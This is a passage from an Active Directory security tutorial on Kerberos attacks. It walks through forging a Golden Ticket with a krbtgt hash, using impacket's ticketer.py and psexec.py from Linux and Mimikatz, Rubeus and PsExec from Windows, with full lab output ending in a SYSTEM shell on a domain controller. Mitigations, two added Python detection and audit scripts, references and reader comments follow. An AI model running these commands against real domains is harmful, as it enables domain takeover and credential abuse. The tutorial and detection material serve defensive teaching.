<p>The krbtgt account NTLM hash can be obtained from the lsass process or the NTDS.dit file of any DC in the domain. It is also possible to get that NTLM hash through a DCsync attack, which can be performed either with the <a href="https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump" rel="nofollow">lsadump::dcsync</a> module of Mimikatz or the impacket example <a href="https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py" rel="nofollow">secretsdump.py</a>. Usually, domain admin privileges or similar are required, no matter what technique is used.</p>
<h4>From Linux</h4>
<p>The way to forge a Golden Ticket is very similar to the Silver Ticket one. The main differences are that, in this case, no service SPN must be specified to ticketer.py, and the krbtgt NTLM hash must be used:</p>
<pre><code class="language-shell">root@kali:impacket-examples# python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for jurassic.park/stegosaurus
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in stegosaurus.ccache
root@kali:impacket-examples# export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
root@kali:impacket-examples# python psexec.py jurassic.park/stegosaurus@lab-wdc02.jurassic.park -k -no-pass
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Requesting shares on lab-wdc02.jurassic.park.....
[*] Found writable share ADMIN$
[*] Uploading file goPntOCB.exe
[*] Opening SVCManager on lab-wdc02.jurassic.park.....
[*] Creating service DMmI on lab-wdc02.jurassic.park.....
[*] Starting service DMmI.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32&gt;whoami
nt authority\system

C:\Windows\system32&gt;
</code></pre>
<p>The result is similar to the Silver Ticket one, but this time the compromised server is the DC, and it could be any machine of the domain.</p>
<h4>From Windows</h4>
<p>As in the Silver ticket case, Mimikatz, Rubeus and PsExec can be used to launch the attack:</p>
<pre><code class="language-shell">C:\Users\triceratops&gt;.\mimikatz.exe

  .#####.   mimikatz 2.1.1 (x64) built on Mar 18 2018 00:21:25
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       &gt; https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        &gt; https://pingcastle.com / https://mysmartlogon.com   ***/

mimikatz # kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:25b2076cda3bfd6209161a6c78a69c1c /user:stegosaurus
User      : stegosaurus
Domain    : jurassic.park (JURASSIC)
SID       : S-1-5-21-1339291983-1349129144-367733775
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 25b2076cda3bfd6209161a6c78a69c1c - rc4_hmac_nt
Lifetime  : 28/02/2019 10:58:03 ; 25/02/2029 10:58:03 ; 25/02/2029 10:58:03
-&gt; Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz # exit
Bye!
C:\Users\triceratops&gt;.\Rubeus.exe ptt /ticket:ticket.kirbi

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.3.3


[*] Action: Import Ticket
[+] Ticket successfully imported!

C:\Users\triceratops&gt;klist

Current LogonId is 0:0x50ca688

Cached Tickets: (1)

#0&gt;     Client: stegosaurus @ jurassic.park
        Server: krbtgt/jurassic.park @ jurassic.park
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -&gt; forwardable renewable initial pre_authent
        Start Time: 2/28/2019 11:36:55 (local)
        End Time:   2/25/2029 11:36:55 (local)
        Renew Time: 2/25/2029 11:36:55 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -&gt; PRIMARY
        Kdc Called:

C:\Users\triceratops&gt;.\PsExec.exe -accepteula \\lab-wdc02.jurassic.park cmd

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32&gt;whoami
jurassic\stegosaurus

C:\Windows\system32&gt;
</code></pre>
<p>While I was performing this technique, it sometimes seemed that the tickets didn&#8217;t work. I was wondering what was happening when I remembered reading <a href="https://passing-the-hash.blogspot.com.es/2014/09/pac-validation-20-minute-rule-and.html" rel="nofollow">this post</a> about the 20 minute rule for PAC validation in the DC. Then I realized that all of the failed tickets were injected after I had been performing some unrelated tasks, which means that between the moment I created the ticket and the moment I injected it, at least half an hour had passed. So, remember to inject the tickets after creating them.</p>
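<p>From the defender's side, the <em>klist</em> output above already shows what gives a forged TGT away: a ten-year lifetime and RC4 encryption. The following added example (not part of the original article) parses <em>klist</em> output and flags such tickets. The policy limits are the Active Directory defaults, and the month/day/year date format, the second ticket and the function names are assumptions made for illustration.</p>

```python
import re
from datetime import datetime, timedelta

# Assumed policy: Active Directory defaults (10 h ticket lifetime, 7 d renewal).
MAX_LIFETIME = timedelta(hours=10)
MAX_RENEWAL = timedelta(days=7)

# Ticket #0 is the cache entry shown on this page; ticket #1 is a constructed
# example of a TGT issued normally by a DC, added for contrast.
KLIST_OUTPUT = """\
Current LogonId is 0:0x50ca688

Cached Tickets: (2)

#0>     Client: stegosaurus @ jurassic.park
        Server: krbtgt/jurassic.park @ jurassic.park
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 2/28/2019 11:36:55 (local)
        End Time:   2/25/2029 11:36:55 (local)
        Renew Time: 2/25/2029 11:36:55 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

#1>     Client: triceratops @ JURASSIC.PARK
        Server: krbtgt/JURASSIC.PARK @ JURASSIC.PARK
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 2/28/2019 9:02:11 (local)
        End Time:   2/28/2019 19:02:11 (local)
        Renew Time: 3/7/2019 9:02:11 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: lab-wdc02.jurassic.park
"""


def parse_klist(text):
    """Return one dict of field name -> value per cached ticket."""
    tickets = []
    for line in text.splitlines():
        if re.match(r"#\d+>", line):          # "#0>" starts a new ticket
            tickets.append({})
            line = line.split(">", 1)[1]
        field = re.match(r"\s*([A-Za-z ]+?):\s*(.*?)\s*$", line)
        if field and tickets:
            tickets[-1][field.group(1)] = field.group(2)
    return tickets


def parse_time(value):
    # klist prints local times in the host's regional format; month/day/year
    # is assumed here because that is what the output on this page uses.
    return datetime.strptime(value.split(" (")[0], "%m/%d/%Y %H:%M:%S")


def review_ticket(ticket):
    """List the properties of one ticket that do not fit the assumed policy."""
    findings = []
    start, end, renew = (parse_time(ticket[k]) for k in ("Start Time", "End Time", "Renew Time"))
    if end - start > MAX_LIFETIME:
        findings.append("lifetime of %d days exceeds policy" % (end - start).days)
    if renew - start > MAX_RENEWAL:
        findings.append("renewal window exceeds policy")
    if "RC4" in ticket.get("KerbTicket Encryption Type", ""):
        findings.append("RC4 ticket encryption")
    # The injected TGT on this page has an empty "Kdc Called" field, while a
    # ticket obtained from a DC names that DC. Treat this as a hint only.
    if ticket.get("Server", "").lower().startswith("krbtgt/") and not ticket.get("Kdc Called"):
        findings.append("TGT with no issuing KDC recorded")
    return findings


def suspicious_tickets(text):
    """Map client name -> findings for every ticket with at least one finding."""
    report = {}
    for ticket in parse_klist(text):
        findings = review_ticket(ticket)
        if findings:
            report[ticket["Client"]] = findings
    return report


if __name__ == "__main__":
    for client, findings in suspicious_tickets(KLIST_OUTPUT).items():
        print(client, "->", "; ".join(findings))
```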
<h3>Mitigations</h3>
<p>In order to prevent or mitigate many of these Kerberos attacks a series of policies can be implemented. Some examples are the following:</p>
<ul>
<li><strong>Enable a strong password policy</strong>: The first step is to avoid weak passwords in domain user accounts. To achieve this, a strong password policy should be implemented by ensuring that the complex password option is enabled on the Active Directory domain. Moreover, common predictable terms, such as company names, years or month names, should be blacklisted in passwords.</li>
<li><strong>Avoid accounts without pre-authentication</strong>: Unless it is strictly necessary, no account should have Kerberos pre-authentication disabled. If this cannot be avoided, take note of these special accounts and give them pseudo-random passwords with a high level of complexity.</li>
<li><strong>Avoid executing services on behalf of user accounts</strong>: Avoid services that run in a domain user account context. If a special user account is used to launch domain services, generate a strong pseudo-random password for that account.</li>
<li><strong>Verify PAC</strong>: Enable PAC verification in order to avoid attacks such as Silver Ticket. To enable this check, set the value <em>ValidateKdcPacSignature</em> (DWORD) in subkey <em>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters</em> to 1.</li>
<li><strong>Change passwords periodically</strong>: Set policies to ensure that user passwords are changed periodically, for example, every 2 to 4 months. As a special case, the <em>krbtgt</em> account password should also be changed periodically, since that key is used to create TGTs. For this purpose, the script <a class="url" href="https://gallery.technet.microsoft.com/Reset-the-krbtgt-account-581a9e51" target="_blank" rel="noopener noreferrer nofollow">https://gallery.technet.microsoft.com/Reset-the-krbtgt-account-581a9e51</a> can be used. Note that the <em>krbtgt</em> password must be changed twice to invalidate current domain tickets, for cache reasons. Another consideration is that the functional level of the domain must be equal to or higher than Windows Server 2008 in order to manipulate the <em>krbtgt</em> account credentials.</li>
<li><strong>Disable Kerberos weak encryption types</strong>: Only Kerberos encryption with AES keys should be allowed. Furthermore, Kerberos requests with a lower level of encryption, such as RC4, should be monitored, since they are usually used by attack tools.</li>
</ul>
<p>Additionally, Microsoft has published a guide which explains in more detail how to prevent and mitigate this sort of attack. It can be downloaded at <a class="url" href="https://www.microsoft.com/en-us/download/details.aspx?id=36036" target="_blank" rel="noopener noreferrer nofollow">https://www.microsoft.com/en-us/download/details.aspx?id=36036</a>.</p>
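<p>Several of the policies above can be checked against an export of account attributes. The following added example (not part of the original article) flags accounts with pre-authentication disabled, user accounts that carry an SPN, SPN owners that still permit RC4 or DES, and an old <em>krbtgt</em> key. The records, the 120-day limit and the function names are constructed for illustration.</p>

```python
from datetime import datetime, timedelta, timezone

# userAccountControl flags and msDS-SupportedEncryptionTypes bits
# (documented Active Directory values).
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_REQ_PREAUTH = 0x400000
ENC_DES = 0x1 | 0x2
ENC_RC4 = 0x4

# Assumption: upper end of the "2 to 4 months" rotation interval.
MAX_PASSWORD_AGE = timedelta(days=120)
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(filetime):
    """pwdLastSet counts 100-nanosecond intervals since 1601-01-01 UTC."""
    return EPOCH_1601 + timedelta(microseconds=filetime // 10)


def to_filetime(year, month, day):
    """Build a pwdLastSet value for the constructed records below."""
    delta = datetime(year, month, day, tzinfo=timezone.utc) - EPOCH_1601
    return (delta.days * 86400 + delta.seconds) * 10_000_000


def account(name, uac, spns, pwd_last_set, enc_types):
    """Shape one constructed record like an LDAP export entry."""
    return {"sAMAccountName": name, "userAccountControl": uac,
            "servicePrincipalName": spns, "pwdLastSet": pwd_last_set,
            "msDS-SupportedEncryptionTypes": enc_types}


# Constructed sample data for the lab domain; none of it comes from the page.
NOW = datetime(2019, 2, 28, tzinfo=timezone.utc)
ACCOUNTS = [
    account("krbtgt", 0x202, ["kadmin/changepw"], to_filetime(2015, 3, 10), None),
    account("svc_sql", 0x200, ["MSSQLSvc/labdb01.jurassic.park:1433"],
            to_filetime(2017, 6, 1), 0x4),
    account("velociraptor", 0x400200, [], to_filetime(2019, 2, 1), 0x18),
    account("triceratops", 0x200, [], to_filetime(2019, 1, 15), None),
    account("LABWWS02$", 0x1000, ["HOST/labwws02.jurassic.park"],
            to_filetime(2019, 2, 20), 0x18),
]


def audit_account(acct, now):
    """Return the findings for one account, per the mitigations listed above."""
    uac = acct["userAccountControl"]
    age = now - filetime_to_datetime(acct["pwdLastSet"])
    if acct["sAMAccountName"].lower() == "krbtgt":
        # krbtgt is disabled by design; what matters is the age of its key.
        if age > MAX_PASSWORD_AGE:
            return ["krbtgt key is %d days old" % age.days]
        return []
    if uac & UF_ACCOUNTDISABLE:
        return []
    findings = []
    if uac & UF_DONT_REQ_PREAUTH:
        findings.append("Kerberos pre-authentication not required")
    is_user = bool(uac & UF_NORMAL_ACCOUNT)
    has_spn = bool(acct["servicePrincipalName"])
    if is_user and has_spn:
        findings.append("service runs under a user account (SPN set)")
    if is_user and age > MAX_PASSWORD_AGE:
        findings.append("password is %d days old" % age.days)
    # Service tickets are encrypted with a key of the SPN owner, so its allowed
    # encryption types matter; an unset attribute is not restricted to AES.
    enc = acct["msDS-SupportedEncryptionTypes"] or 0
    if has_spn and (enc == 0 or enc & (ENC_DES | ENC_RC4)):
        findings.append("encryption types not restricted to AES")
    return findings


def audit(accounts, now):
    """Map account name -> findings, omitting accounts with none."""
    report = {}
    for acct in accounts:
        findings = audit_account(acct, now)
        if findings:
            report[acct["sAMAccountName"]] = findings
    return report


if __name__ == "__main__":
    for name, findings in audit(ACCOUNTS, NOW).items():
        print(name, "->", "; ".join(findings))
```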
<h3>Conclusion</h3>
<p>As has been shown, Kerberos has an enormous attack surface that attackers can use. Therefore, it is necessary to be aware of these attack techniques in order to deploy a set of security policies that prevent and mitigate them.</p>
<p>However, the journey is not over yet. Until now, only direct attacks have been seen, and there is a Kerberos feature that allows this surface to be expanded: Delegation.</p>
<p>Therefore, the next post of this series will try to explain this feature and how it can be abused to steal and compromise domain accounts.</p>
<h3>References</h3>
<ul>
<li>MS-KILE: <a class="url" href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/2a32282e-dd48-4ad9-a542-609804b02cc9" target="_blank" rel="noopener noreferrer nofollow">https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/2a32282e-dd48-4ad9-a542-609804b02cc9</a></li>
<li>Impacket: <a class="url" href="https://github.com/SecureAuthCorp/impacket" target="_blank" rel="noopener noreferrer nofollow">https://github.com/SecureAuthCorp/impacket</a></li>
<li>Mimikatz: <a class="url" href="https://github.com/gentilkiwi/mimikatz" target="_blank" rel="noopener noreferrer nofollow">https://github.com/gentilkiwi/mimikatz</a></li>
<li>Rubeus: <a class="url" href="https://github.com/GhostPack/Rubeus" target="_blank" rel="noopener noreferrer nofollow">https://github.com/GhostPack/Rubeus</a></li>
<li>Invoke-Kerberoast: <a class="url" href="https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1" target="_blank" rel="noopener noreferrer nofollow">https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1</a></li>
<li>Kerbrute.py: <a class="url" href="https://github.com/TarlogicSecurity/kerbrute" target="_blank" rel="noopener noreferrer">https://github.com/TarlogicSecurity/kerbrute</a></li>
<li>ticket_converter.py: <a class="url" href="https://github.com/Zer1t0/ticket_converter" target="_blank" rel="noopener noreferrer nofollow">https://github.com/Zer1t0/ticket_converter</a></li>
<li>Tickey: <a class="url" href="https://github.com/TarlogicSecurity/tickey" target="_blank" rel="noopener noreferrer nofollow">https://github.com/TarlogicSecurity/tickey</a></li>
<li>Kerberos Credential Thievery (GNU/Linux): <a class="url" href="https://www.delaat.net/rp/2016-2017/p97/report.pdf" target="_blank" rel="noopener noreferrer nofollow">https://www.delaat.net/rp/2016-2017/p97/report.pdf</a></li>
<li>Fun with LDAP and Kerberos in AD environments: <a class="url" href="https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=79" target="_blank" rel="noopener noreferrer nofollow">https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=79</a></li>
<li>20 Minute Rule PAC: <a class="url" href="https://passing-the-hash.blogspot.com.es/2014/09/pac-validation-20-minute-rule-and.html" target="_blank" rel="noopener noreferrer nofollow">https://passing-the-hash.blogspot.com.es/2014/09/pac-validation-20-minute-rule-and.html</a></li>
<li>Mimikatz and your credentials: <a class="url" href="https://www.nosuchcon.org/talks/2014/D2_02_Benjamin_Delpy_Mimikatz.pdf" target="_blank" rel="noopener noreferrer nofollow">https://www.nosuchcon.org/talks/2014/D2_02_Benjamin_Delpy_Mimikatz.pdf</a></li>
<li>MIT Kerberos Credential cache types: <a class="url" href="https://web.mit.edu/kerberos/krb5-devel/doc/basic/ccache_def.html" target="_blank" rel="noopener noreferrer nofollow">https://web.mit.edu/kerberos/krb5-devel/doc/basic/ccache_def.html</a></li>
<li>MIT Kerberos File ccache format: <a class="url" href="https://web.mit.edu/kerberos/krb5-devel/doc/formats/ccache_file_format.html" target="_blank" rel="noopener noreferrer nofollow">https://web.mit.edu/kerberos/krb5-devel/doc/formats/ccache_file_format.html</a></li>
<li>Detecting Kerberoasting: <a class="url" href="https://adsecurity.org/?p=3458" target="_blank" rel="noopener noreferrer nofollow">https://adsecurity.org/?p=3458</a></li>
</ul>
<div class="post_series">
<div class="post_series__title">More articles in this series about Kerberos</div>
<p>This article is part of a series of articles about Kerberos</p>
<ol>
<li><a href="https://www.tarlogic.com/blog/how-kerberos-works/">Kerberos (I): How does Kerberos work? &#8211; Theory</a></li>
<li>Kerberos (II): How to attack Kerberos?</li>
<li><a href="https://www.tarlogic.com/blog/kerberos-iii-how-does-delegation-work/">Kerberos (III): How does delegation work?</a></li>
</ol></div>
</div>
</article>
<div class="section">
<div id="comments" class="comments-container">
<div class="fusion-title fusion-title-size-three sep-double sep-solid" style="margin-top:0px;margin-bottom:31px;">
<h3 class="title-heading-left" style="margin:0;">
3 Comments </h3>
<div class="title-sep-container">
<div class="title-sep sep-double sep-solid"></div>
</div>
</div>
<ol class="comment-list commentlist">
<li class="comment even thread-even depth-1" id="comment-23651">
<div class="the-comment">
<div class="comment-box">
<div class="comment-author meta">
<strong>Smokey</strong>
4 June, 2019 at 4:29 pm </div>
<div class="comment-text">
<p>great reading!!!!!!! thank you for sharing!</p>
</div>
</div>
</div>
</li>
<li class="comment odd alt thread-odd thread-alt depth-1" id="comment-23704">
<div class="the-comment">
<div class="comment-box">
<div class="comment-author meta">
<strong>Jesse</strong>
7 June, 2019 at 5:12 am </div>
<div class="comment-text">
<p>Hi. It looks like the Mimikatz for Windows for Silver ticket was accidentally replaced with the Golden ticket procedure. Is that right? Or am I missing something?</p>
</div>
</div>
</div>
<ul class="children">
<li class="comment byuser comment-author-eloy-pereztarlogic-com bypostauthor even depth-2" id="comment-23707">
<div class="the-comment">
<div class="comment-box">
<div class="comment-author meta">
<strong>Eloy Pérez</strong>
7 June, 2019 at 8:28 am </div>
<div class="comment-text">
<p>Hi, that's an excellent question because that command could be a little confusing; however, it is not a mistake. Mimikatz uses the same command (kerberos::golden) to generate silver and golden tickets. It generates a TGS or TGT based on the arguments provided; more specifically, if you provide the service parameter, then a TGS will be generated. There is more information in <a href="https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos#golden--silver" rel="nofollow ugc">https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos#golden--silver</a>.</p>
</div>
</div>
</div>
</li>
</ul>
</li>
<li class="comment odd alt thread-even depth-1" id="comment-31239">
<div class="the-comment">
<div class="comment-box">
<div class="comment-author meta">
<strong>cionsystems</strong>
12 February, 2020 at 5:19 pm </div>
<div class="comment-text">
<p>Thanks for sharing Active Directory auditor tips. For more info I refer cion systems Active Directory auditor in USA.</p>
</div>
</div>
</div>
</li>
<li class="comment even thread-odd thread-alt depth-1" id="comment-51525">
<div class="the-comment">
<div class="comment-box">
<div class="comment-author meta">
<strong>Jorko: Wonderchimp</strong>
12 March, 2020 at 4:34 am </div>
<div class="comment-text">
<p>Excellent article! Great job of organizing all this data in an easy to read format!</p>
</div>
</div>
</div>
</li>
</ol>
</div>
</div>
</section>
</main>
<footer>
<div class="footer_info">
<div class="footer_info__container">
<div class="wrapper footer_info__columns">
<div>
<svg xmlns="https://www.w3.org/2000/svg" width="229.662" height="83.558" viewBox="0 0 229.662 83.558">
<g id="tarlogic_logo_white" transform="translate(-6607.973 -1592.841)">
<g id="Grupo_1945" data-name="Grupo 1945" transform="translate(6674.585 1648.134)">
<path id="Trazado_4828" data-name="Trazado 4828" d="M6657.508,1618.417h3.951v.831h-2.989v1.436h2.768v.786h-2.768v1.606h3.044v.831h-4.006Z" transform="translate(-6616.071 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4829" data-name="Trazado 4829" d="M6664.391,1620.231a1.994,1.994,0,0,0-.169-.437,1.2,1.2,0,0,0-.277-.347,1.242,1.242,0,0,0-.4-.226,1.572,1.572,0,0,0-.528-.082,1.527,1.527,0,0,0-.755.179,1.44,1.44,0,0,0-.519.472,2.184,2.184,0,0,0-.3.674,3.2,3.2,0,0,0,0,1.537,2.147,2.147,0,0,0,.3.672,1.461,1.461,0,0,0,.519.474,1.527,1.527,0,0,0,.755.176,1.341,1.341,0,0,0,.568-.112,1.248,1.248,0,0,0,.426-.308,1.467,1.467,0,0,0,.274-.457,2.164,2.164,0,0,0,.132-.562h.938a2.6,2.6,0,0,1-.211.9,2.237,2.237,0,0,1-.489.7,2.127,2.127,0,0,1-.723.457,2.51,2.51,0,0,1-.916.161,2.587,2.587,0,0,1-1.1-.226,2.457,2.457,0,0,1-.828-.618,2.784,2.784,0,0,1-.518-.917,3.482,3.482,0,0,1,0-2.22,2.76,2.76,0,0,1,.518-.917,2.524,2.524,0,0,1,.828-.622,2.552,2.552,0,0,1,1.1-.231,2.924,2.924,0,0,1,.87.127,2.265,2.265,0,0,1,.719.368,1.9,1.9,0,0,1,.5.59,2.03,2.03,0,0,1,.237.79Z" transform="translate(-6612.745 -1618.356)" fill="#00bfb3"></path>
<path id="Trazado_4830" data-name="Trazado 4830" d="M6663.85,1618.417h.96v3.2a5.2,5.2,0,0,0,.028.56,1.263,1.263,0,0,0,.153.51.973.973,0,0,0,.383.375,1.507,1.507,0,0,0,.729.146,1.473,1.473,0,0,0,.724-.146.972.972,0,0,0,.387-.375,1.312,1.312,0,0,0,.155-.51c.018-.189.025-.377.025-.56v-3.2h.96v3.513a2.393,2.393,0,0,1-.159.921,1.792,1.792,0,0,1-.459.659,1.944,1.944,0,0,1-.71.4,3.368,3.368,0,0,1-1.846,0,1.917,1.917,0,0,1-.711-.4,1.79,1.79,0,0,1-.458-.659,2.41,2.41,0,0,1-.161-.921Z" transform="translate(-6608.76 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4831" data-name="Trazado 4831" d="M6667.228,1618.417h2.622a2.025,2.025,0,0,1,1.36.392,1.365,1.365,0,0,1,.453,1.091,1.579,1.579,0,0,1-.114.65,1.38,1.38,0,0,1-.27.413,1.037,1.037,0,0,1-.3.229c-.1.045-.173.077-.22.092v.015a1.006,1.006,0,0,1,.265.077.775.775,0,0,1,.266.2,1.051,1.051,0,0,1,.2.349,1.545,1.545,0,0,1,.082.538,4.781,4.781,0,0,0,.073.881,1.139,1.139,0,0,0,.226.566h-1.031a.9.9,0,0,1-.126-.394c-.013-.142-.018-.28-.018-.413a4.11,4.11,0,0,0-.047-.65,1.081,1.081,0,0,0-.172-.454.691.691,0,0,0-.332-.265,1.484,1.484,0,0,0-.543-.084h-1.415v2.26h-.96Zm.96,2.5h1.575a1.007,1.007,0,0,0,.7-.218.848.848,0,0,0,.238-.658.991.991,0,0,0-.076-.427.592.592,0,0,0-.21-.256.78.78,0,0,0-.309-.125,2.182,2.182,0,0,0-.358-.03h-1.561Z" transform="translate(-6604.866 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4832" data-name="Trazado 4832" d="M6670.514,1618.417h.961v5.49h-.961Z" transform="translate(-6601.081 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4833" data-name="Trazado 4833" d="M6672.036,1618.417h4.443v.831h-1.747v4.659h-.96v-4.659h-1.736Z" transform="translate(-6599.325 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4834" data-name="Trazado 4834" d="M6676.934,1621.754l-2.06-3.337h1.114l1.453,2.461,1.43-2.461h1.076l-2.054,3.337v2.153h-.96Z" transform="translate(-6596.052 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4835" data-name="Trazado 4835" d="M6680.016,1618.417h3.953v.831h-2.99v1.436h2.766v.786h-2.766v1.606h3.044v.831h-4.007Z" transform="translate(-6590.125 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4836" data-name="Trazado 4836" d="M6682.888,1618.417h1.146l1.245,1.938,1.3-1.937h1.076l-1.813,2.643,1.942,2.846h-1.166l-1.369-2.1-1.39,2.1h-1.1l1.947-2.846Z" transform="translate(-6586.968 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4837" data-name="Trazado 4837" d="M6686.123,1618.417h2.421a2.31,2.31,0,0,1,.953.168,1.475,1.475,0,0,1,.568.424,1.391,1.391,0,0,1,.273.553,2.31,2.31,0,0,1,.074.553,2.237,2.237,0,0,1-.074.549,1.416,1.416,0,0,1-.273.551,1.45,1.45,0,0,1-.568.417,2.313,2.313,0,0,1-.953.166h-1.461v2.108h-.96Zm.96,2.6h1.407a1.209,1.209,0,0,0,.331-.047.965.965,0,0,0,.312-.149.75.75,0,0,0,.229-.278.954.954,0,0,0,.089-.435,1.1,1.1,0,0,0-.078-.446.72.72,0,0,0-.205-.28.75.75,0,0,0-.3-.142,1.613,1.613,0,0,0-.361-.038h-1.422Z" transform="translate(-6583.085 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4838" data-name="Trazado 4838" d="M6689.275,1618.417h3.951v.831h-2.989v1.436H6693v.786h-2.767v1.606h3.044v.831h-4.006Z" transform="translate(-6579.45 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4839" data-name="Trazado 4839" d="M6692.3,1618.417h2.623a2.03,2.03,0,0,1,1.36.392,1.364,1.364,0,0,1,.452,1.091,1.6,1.6,0,0,1-.113.65,1.419,1.419,0,0,1-.27.413,1.053,1.053,0,0,1-.3.229c-.1.045-.174.077-.22.092v.015a1,1,0,0,1,.266.077.781.781,0,0,1,.265.2,1.086,1.086,0,0,1,.2.349,1.551,1.551,0,0,1,.079.538,4.952,4.952,0,0,0,.074.881,1.166,1.166,0,0,0,.228.566h-1.03a.886.886,0,0,1-.128-.394c-.012-.142-.019-.28-.019-.413a4.121,4.121,0,0,0-.046-.65,1.107,1.107,0,0,0-.17-.454.71.71,0,0,0-.334-.265,1.482,1.482,0,0,0-.542-.084h-1.414v2.26h-.962Zm.962,2.5h1.575a1.006,1.006,0,0,0,.7-.218.848.848,0,0,0,.239-.658,1,1,0,0,0-.077-.427.6.6,0,0,0-.211-.256.768.768,0,0,0-.309-.125,2.173,2.173,0,0,0-.358-.03h-1.559Z" transform="translate(-6575.968 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4840" data-name="Trazado 4840" d="M6695.276,1618.417h4.443v.831h-1.744v4.659h-.963v-4.659h-1.736Z" transform="translate(-6572.536 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4841" data-name="Trazado 4841" d="M6699.216,1622.147a1.2,1.2,0,0,0,.108.538.971.971,0,0,0,.3.364,1.321,1.321,0,0,0,.441.209,2.19,2.19,0,0,0,.543.064,1.718,1.718,0,0,0,.538-.073,1.083,1.083,0,0,0,.361-.187.691.691,0,0,0,.2-.267.8.8,0,0,0,.06-.3.664.664,0,0,0-.142-.465.817.817,0,0,0-.312-.211,6.807,6.807,0,0,0-.68-.2q-.39-.094-.957-.25a2.037,2.037,0,0,1-.587-.241,1.338,1.338,0,0,1-.373-.336,1.147,1.147,0,0,1-.2-.392,1.615,1.615,0,0,1-.058-.422,1.418,1.418,0,0,1,.174-.719,1.525,1.525,0,0,1,.458-.5,1.955,1.955,0,0,1,.644-.295,2.9,2.9,0,0,1,1.543.015,2,2,0,0,1,.668.334,1.57,1.57,0,0,1,.626,1.307h-.96a.931.931,0,0,0-.362-.749,1.431,1.431,0,0,0-.821-.22,1.77,1.77,0,0,0-.348.037,1.011,1.011,0,0,0-.321.114.7.7,0,0,0-.242.219.576.576,0,0,0-.1.344.594.594,0,0,0,.182.458,1.16,1.16,0,0,0,.475.25l.239.065c.143.039.3.082.474.127l.511.136c.168.043.285.075.358.094a1.618,1.618,0,0,1,.47.233,1.422,1.422,0,0,1,.6,1.167,1.566,1.566,0,0,1-.188.788,1.618,1.618,0,0,1-.5.536,2.18,2.18,0,0,1-.7.3,3.441,3.441,0,0,1-.8.094,3.331,3.331,0,0,1-.885-.114,2.077,2.077,0,0,1-.725-.355,1.783,1.783,0,0,1-.493-.609,2.1,2.1,0,0,1-.191-.881Z" transform="translate(-6569.102 -1618.356)" fill="#00bfb3"></path>
</g>
</g>
</svg>
</div>
<div>
<h6 class="footer_info__title">CONTACT INFO</h6>
<div class="footer_info__contact">
